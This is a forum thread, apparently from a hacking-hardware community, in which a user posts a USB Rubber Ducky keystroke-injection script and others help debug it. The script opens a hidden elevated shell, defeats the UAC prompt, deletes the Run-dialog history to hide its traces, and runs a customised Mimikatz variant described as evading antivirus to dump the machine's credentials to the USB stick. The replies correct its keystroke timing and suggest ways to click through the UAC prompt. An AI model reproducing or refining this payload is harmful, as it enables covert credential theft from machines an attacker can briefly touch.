OK, I give up. I have spent a couple of days trying to get this working; need help


L07TB0Y

Here is my code:

DELAY 3000
ESC
DELAY 300
GUI r
DELAY 500
ENTER
STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=20&reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs"
DELAY 1000
ALT Y
DELAY 1000
LEFTARROW
DELAY 300
ENTER
DELAY 500
STRING for /f %d in ('wmic volume get driveletter^, label^|findstr "FILES"') do @set FILES=%d
DELAY 300
ENTER
DELAY 1000
STRING if exist %FILES%\lb.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module %FILES%\lb.ps1;Invoke-Mimidogz -DumpCreds |Out-File '%FILES%\%computername%_creds.txt';"
DELAY 300
ENTER

 

 

Issue 1:

The UAC is not going away by either ALT Y or LEFTARROW and ENTER, but even after this, if I click OK manually, it does not work.

FILES is the name of the Rubber Ducky.

lb.ps1 is the customized mimi that does not get detected by AV etc.

What am I doing wrong?

Link to comment
Share on other sites

Just from the look of it, the ENTER is at the wrong place:

DELAY 3000
ESC
DELAY 300
GUI r
DELAY 500
ENTER
STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=20&reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs"
DELAY 1000
ALT Y

should be

DELAY 3000
ESC
DELAY 300
GUI r
DELAY 500
STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=20&reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs"
ENTER
DELAY 1000
ALT Y

Your version might have worked by accident if the last command the user typed in their Run box was CMD.

 

My advice to you: debug your own scripts by manually executing every line, step by step, and see where it goes wrong. Also, keep in mind that a script designed on one version of Windows might not work on another. The LEFTARROW and ENTER that follow have no function on my Windows 8.1 box. So when asking for help, tell us the OS you're using.

 

 

 

 

 

 

Edited by Guest
Link to comment
Share on other sites

Regarding the UAC screen, try making an extremely easy script and see if any of these successfully bypasses the UAC message:

DEFAULT_DELAY 3000
GUI r
STRING regedit
ENTER
ALT Y

or


DEFAULT_DELAY 3000
GUI r
STRING regedit
ENTER
LEFTARROW
ENTER

or

DEFAULT_DELAY 3000
GUI r
STRING regedit
ENTER
TAB
TAB
TAB (number of tabs needed to select "yes")
ENTER

 
